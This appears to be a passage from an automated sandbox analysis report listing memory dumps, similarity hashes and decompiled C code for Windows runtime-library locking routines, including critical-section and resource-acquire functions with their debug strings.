                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: %%%u$Wktw$]:%u
                                                                                                                                                                                    • API String ID: 48624451-109597917
                                                                                                                                                                                    • Opcode ID: 537d6261ee2b61f802fa8ca0c61e8041d4b6605e045406cde82efea1451c2042
                                                                                                                                                                                    • Instruction ID: 6655b16f0650f7b97aa4ea8706c48ec0bab12e7c24aa7770bb7f133a35798d25
                                                                                                                                                                                    • Opcode Fuzzy Hash: 537d6261ee2b61f802fa8ca0c61e8041d4b6605e045406cde82efea1451c2042
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59218F7290022DABDF20EE58CC49AEB73ACFB50704F444555F856D3241DF74EA598BE1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                                                    			E008653A5(signed int _a4, char _a8) {
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                    				signed int* _t79;
                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                    				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                    				_t71 = _t64 + 0x28;
                                                                                                                                                                                    				_push(_t92);
                                                                                                                                                                                    				if(_t32 < 0) {
                                                                                                                                                                                    					_t78 =  *[fs:0x18];
                                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                                    						asm("lock xadd [ecx], eax");
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					L3:
                                                                                                                                                                                    					_push(_t86);
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						L4:
                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                    							return 0;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                    							_t79 = _t64 + 0x24;
                                                                                                                                                                                    							_t71 = 1;
                                                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                                                    							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                    							_a4 = _t32;
                                                                                                                                                                                    							__eflags = _t32;
                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                    								L19:
                                                                                                                                                                                    								_t86 = 0;
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009201c0;
                                                                                                                                                                                    									_push(_t92);
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_t37 = E0083F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                                    									__eflags = _t37 - 0x102;
                                                                                                                                                                                    									if(_t37 != 0x102) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t71 =  *(_t92 + 4);
                                                                                                                                                                                    									_t85 =  *_t92;
                                                                                                                                                                                    									_t51 = E00884FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                                    									_push(_t85);
                                                                                                                                                                                    									_push(_t51);
                                                                                                                                                                                    									E00893F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                                    									E00893F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                                    									_t86 = _t86 + 1;
                                                                                                                                                                                    									_t105 = _t104 + 0x28;
                                                                                                                                                                                    									__eflags = _t86 - 2;
                                                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                                                    										E008C217A(_t71, __eflags, _t64);
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_push(0x65);
                                                                                                                                                                                    									E00893F92();
                                                                                                                                                                                    									_t104 = _t105 + 0xc;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								__eflags = _t37;
                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                    									_push(_t37);
                                                                                                                                                                                    									E00883915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                                    									asm("int3");
                                                                                                                                                                                    									_t40 =  *_t71;
                                                                                                                                                                                    									 *_t71 = 0;
                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                    										L1:
                                                                                                                                                                                    										_t42 = E00865384(_t92 + 0x24);
                                                                                                                                                                                    										if(_t42 != 0) {
                                                                                                                                                                                    											goto L31;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                    										}
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                                    										_push( &_a4);
                                                                                                                                                                                    										_push(_t40);
                                                                                                                                                                                    										_t49 = E0083F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                                    										__eflags = _t49;
                                                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                                                    											goto L1;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_push(_t49);
                                                                                                                                                                                    											E00883915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                                    											L31:
                                                                                                                                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                    											_push( &_a4);
                                                                                                                                                                                    											_push(1);
                                                                                                                                                                                    											_t42 = E0083F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                    											__eflags = _t42;
                                                                                                                                                                                    											if(__eflags >= 0) {
                                                                                                                                                                                    												L2:
                                                                                                                                                                                    												return _t42;
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												_push(_t42);
                                                                                                                                                                                    												E00883915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                    												_push( &_a4);
                                                                                                                                                                                    												_push(1);
                                                                                                                                                                                    												_t42 = E0083F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                    												__eflags = _t42;
                                                                                                                                                                                    												if(__eflags >= 0) {
                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                    												} else {
                                                                                                                                                                                    													_push(_t42);
                                                                                                                                                                                    													_t45 = E00883915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                    													asm("int3");
                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                    														_t74 = _t45;
                                                                                                                                                                                    														__eflags = _t45 - 1;
                                                                                                                                                                                    														if(_t45 != 1) {
                                                                                                                                                                                    															break;
                                                                                                                                                                                    														}
                                                                                                                                                                                    														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                                    														_t45 = _t74;
                                                                                                                                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                    														__eflags = _t45 - _t74;
                                                                                                                                                                                    														if(_t45 != _t74) {
                                                                                                                                                                                    															continue;
                                                                                                                                                                                    														} else {
                                                                                                                                                                                    															_t46 =  *[fs:0x18];
                                                                                                                                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                                    															return _t46;
                                                                                                                                                                                    														}
                                                                                                                                                                                    														goto L38;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													E00865329(_t74, _t92);
                                                                                                                                                                                    													_push(1);
                                                                                                                                                                                    													_t48 = E008653A5(_t92);
                                                                                                                                                                                    													return _t48;
                                                                                                                                                                                    												}
                                                                                                                                                                                    											}
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t71 =  *_t79;
                                                                                                                                                                                    								__eflags = _t71;
                                                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                    										_t57 = _t71;
                                                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                    										__eflags = _t57 - _t71;
                                                                                                                                                                                    										if(_t57 == _t71) {
                                                                                                                                                                                    											break;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_t71 = _t57;
                                                                                                                                                                                    										__eflags = _t57;
                                                                                                                                                                                    										if(_t57 > 0) {
                                                                                                                                                                                    											continue;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t32 = _a4;
                                                                                                                                                                                    									__eflags = _t71;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									goto L19;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                                    					_t32 = 0;
                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L38:
                                                                                                                                                                                    			}


























                                                                                                                                                                                    0x008653ab
                                                                                                                                                                                    0x008653ae
                                                                                                                                                                                    0x008653b1
                                                                                                                                                                                    0x008653b4
                                                                                                                                                                                    0x008653b7
                                                                                                                                                                                    0x008805b6
                                                                                                                                                                                    0x008805c0
                                                                                                                                                                                    0x008805c3
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008805c9
                                                                                                                                                                                    0x008805c9
                                                                                                                                                                                    0x008805cc
                                                                                                                                                                                    0x008805d5
                                                                                                                                                                                    0x008805d5
                                                                                                                                                                                    0x008653bd
                                                                                                                                                                                    0x008653bd
                                                                                                                                                                                    0x008653bd
                                                                                                                                                                                    0x008653be
                                                                                                                                                                                    0x008653be
                                                                                                                                                                                    0x008653be
                                                                                                                                                                                    0x008653c0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2269
                                                                                                                                                                                    0x008a226d
                                                                                                                                                                                    0x008a2349
                                                                                                                                                                                    0x008a234d
                                                                                                                                                                                    0x008a2273
                                                                                                                                                                                    0x008a2276
                                                                                                                                                                                    0x008a2279
                                                                                                                                                                                    0x008a227e
                                                                                                                                                                                    0x008a2283
                                                                                                                                                                                    0x008a2287
                                                                                                                                                                                    0x008a228a
                                                                                                                                                                                    0x008a228d
                                                                                                                                                                                    0x008a228f
                                                                                                                                                                                    0x008a22bc
                                                                                                                                                                                    0x008a22bc
                                                                                                                                                                                    0x008a22bc
                                                                                                                                                                                    0x008a22be
                                                                                                                                                                                    0x008a22c4
                                                                                                                                                                                    0x008a22cc
                                                                                                                                                                                    0x008a22d0
                                                                                                                                                                                    0x008a22d6
                                                                                                                                                                                    0x008a22d7
                                                                                                                                                                                    0x008a22da
                                                                                                                                                                                    0x008a22df
                                                                                                                                                                                    0x008a22e4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22e6
                                                                                                                                                                                    0x008a22e9
                                                                                                                                                                                    0x008a22f4
                                                                                                                                                                                    0x008a22f9
                                                                                                                                                                                    0x008a22fa
                                                                                                                                                                                    0x008a2305
                                                                                                                                                                                    0x008a2314
                                                                                                                                                                                    0x008a2319
                                                                                                                                                                                    0x008a231a
                                                                                                                                                                                    0x008a231d
                                                                                                                                                                                    0x008a2320
                                                                                                                                                                                    0x008a2323
                                                                                                                                                                                    0x008a2323
                                                                                                                                                                                    0x008a2328
                                                                                                                                                                                    0x008a232d
                                                                                                                                                                                    0x008a232f
                                                                                                                                                                                    0x008a2331
                                                                                                                                                                                    0x008a2336
                                                                                                                                                                                    0x008a2336
                                                                                                                                                                                    0x008a233b
                                                                                                                                                                                    0x008a233d
                                                                                                                                                                                    0x008a2350
                                                                                                                                                                                    0x008a2351
                                                                                                                                                                                    0x008a2356
                                                                                                                                                                                    0x008a2359
                                                                                                                                                                                    0x008a2359
                                                                                                                                                                                    0x008a235b
                                                                                                                                                                                    0x008a235d
                                                                                                                                                                                    0x00865367
                                                                                                                                                                                    0x0086536b
                                                                                                                                                                                    0x00865372
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2363
                                                                                                                                                                                    0x008a2363
                                                                                                                                                                                    0x008a2369
                                                                                                                                                                                    0x008a236a
                                                                                                                                                                                    0x008a236c
                                                                                                                                                                                    0x008a2371
                                                                                                                                                                                    0x008a2373
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a2379
                                                                                                                                                                                    0x008a2379
                                                                                                                                                                                    0x008a237a
                                                                                                                                                                                    0x008a237f
                                                                                                                                                                                    0x008a237f
                                                                                                                                                                                    0x008a2385
                                                                                                                                                                                    0x008a2386
                                                                                                                                                                                    0x008a2389
                                                                                                                                                                                    0x008a238e
                                                                                                                                                                                    0x008a2390
                                                                                                                                                                                    0x00865378
                                                                                                                                                                                    0x0086537c
                                                                                                                                                                                    0x008a2396
                                                                                                                                                                                    0x008a2396
                                                                                                                                                                                    0x008a2397
                                                                                                                                                                                    0x008a239c
                                                                                                                                                                                    0x008a23a2
                                                                                                                                                                                    0x008a23a3
                                                                                                                                                                                    0x008a23a6
                                                                                                                                                                                    0x008a23ab
                                                                                                                                                                                    0x008a23ad
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a23b3
                                                                                                                                                                                    0x008a23b3
                                                                                                                                                                                    0x008a23b4
                                                                                                                                                                                    0x008a23b9
                                                                                                                                                                                    0x008a23ba
                                                                                                                                                                                    0x008a23ba
                                                                                                                                                                                    0x008a23bc
                                                                                                                                                                                    0x008a23bf
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00899153
                                                                                                                                                                                    0x00899158
                                                                                                                                                                                    0x0089915a
                                                                                                                                                                                    0x0089915e
                                                                                                                                                                                    0x00899160
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00899166
                                                                                                                                                                                    0x00899166
                                                                                                                                                                                    0x00899171
                                                                                                                                                                                    0x00899176
                                                                                                                                                                                    0x00899176
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00899160
                                                                                                                                                                                    0x008a23c6
                                                                                                                                                                                    0x008a23cb
                                                                                                                                                                                    0x008a23ce
                                                                                                                                                                                    0x008a23d7
                                                                                                                                                                                    0x008a23d7
                                                                                                                                                                                    0x008a23ad
                                                                                                                                                                                    0x008a2390
                                                                                                                                                                                    0x008a2373
                                                                                                                                                                                    0x008a233f
                                                                                                                                                                                    0x008a233f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a233f
                                                                                                                                                                                    0x008a2291
                                                                                                                                                                                    0x008a2291
                                                                                                                                                                                    0x008a2293
                                                                                                                                                                                    0x008a2295
                                                                                                                                                                                    0x008a229a
                                                                                                                                                                                    0x008a22a1
                                                                                                                                                                                    0x008a22a3
                                                                                                                                                                                    0x008a22a7
                                                                                                                                                                                    0x008a22a9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22ab
                                                                                                                                                                                    0x008a22ad
                                                                                                                                                                                    0x008a22af
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22af
                                                                                                                                                                                    0x008a22b1
                                                                                                                                                                                    0x008a22b4
                                                                                                                                                                                    0x008a22b4
                                                                                                                                                                                    0x008a22b6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a22b6
                                                                                                                                                                                    0x008a228f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008a226d
                                                                                                                                                                                    0x008653cb
                                                                                                                                                                                    0x008653ce
                                                                                                                                                                                    0x008653d0
                                                                                                                                                                                    0x008653d4
                                                                                                                                                                                    0x008653d6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008653d8
                                                                                                                                                                                    0x008653e3
                                                                                                                                                                                    0x008653ea
                                                                                                                                                                                    0x008653ea
                                                                                                                                                                                    0x008653d6
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A22F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 008A2328
                                                                                                                                                                                    • RTL: Resource at %p, xrefs: 008A230B
                                                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008A22FC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                                                    • Opcode ID: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
                                                                                                                                                                                    • Instruction ID: 846e5c138287798e3c49dc6e2b7f599e24e904b23faf8e6ba472c83feaf15288
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ec60df9924a8d7420f6ae7ccbc630ed5e2ff7dec621667107d5af8c622c1b3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 525126716007056BEF25EB2CCC81FA67398FF56760F114229FD04DB781EA64EC4187A1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                    			E0086EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                    				short _v66;
                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                    				signed char _t67;
                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                    				void* _t93;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t80 = __edi;
                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                    				_t70 = __ecx;
                                                                                                                                                                                    				_t84 = _a4;
                                                                                                                                                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                                    					E0085DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                    				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                                    				if(_t38 == 0xffffffff) {
                                                                                                                                                                                    					_t39 =  *0x92793c; // 0x0
                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                    					_push(_t84);
                                                                                                                                                                                    					_t40 = E008416C0(_t39);
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					_t40 = E0083F9D4(_t38);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_pop(_t85);
                                                                                                                                                                                    				__eflags = _t40;
                                                                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                                                                    					_push(_t40);
                                                                                                                                                                                    					E00883915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                                    					asm("int3");
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						L21:
                                                                                                                                                                                    						_t76 =  *[fs:0x18];
                                                                                                                                                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                                    							_v66 = 0x1722;
                                                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                    							_t76 =  &_v72;
                                                                                                                                                                                    							_push( &_v72);
                                                                                                                                                                                    							_v28 = _t85;
                                                                                                                                                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                    							_push(0x20402);
                                                                                                                                                                                    							E008401A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							_t43 = _v8;
                                                                                                                                                                                    							_push(_t80);
                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                    							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                    							if(_t43 == 0xffffffff) {
                                                                                                                                                                                    								_t71 =  *0x92793c; // 0x0
                                                                                                                                                                                    								_push(_t85);
                                                                                                                                                                                    								_t44 = E00841F28(_t71);
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t44 = E0083F8CC(_t43);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t44 - 0x102;
                                                                                                                                                                                    							if(_t44 != 0x102) {
                                                                                                                                                                                    								__eflags = _t44;
                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                    									_push(_t44);
                                                                                                                                                                                    									E00883915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                                    									asm("int3");
                                                                                                                                                                                    									E008C2306(_t85);
                                                                                                                                                                                    									__eflags = _t67 & 0x00000002;
                                                                                                                                                                                    									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                                    										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                                    										_t72 = _t7;
                                                                                                                                                                                    										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                                    										__eflags = _t67 - _t67;
                                                                                                                                                                                    										if(_t67 == _t67) {
                                                                                                                                                                                    											E0086EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    									return 0;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									__eflags = _v24;
                                                                                                                                                                                    									if(_v24 != 0) {
                                                                                                                                                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									return 2;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								goto L36;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                                    							_push(_t67);
                                                                                                                                                                                    							_t46 = E00884FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                                    							_push(_t77);
                                                                                                                                                                                    							E00893F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                                    							_t48 =  *_t85;
                                                                                                                                                                                    							_t92 = _t91 + 0x18;
                                                                                                                                                                                    							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                    							if(_t48 == 0xffffffff) {
                                                                                                                                                                                    								_t49 = 0;
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                    							_push(_t49);
                                                                                                                                                                                    							_t50 = _v12;
                                                                                                                                                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                                    							_push(_t85);
                                                                                                                                                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                                    							E00893F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                                    							_t53 =  *_t85;
                                                                                                                                                                                    							_t93 = _t92 + 0x20;
                                                                                                                                                                                    							_t67 = _t67 + 1;
                                                                                                                                                                                    							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                    							if(_t53 != 0xffffffff) {
                                                                                                                                                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t67 - 2;
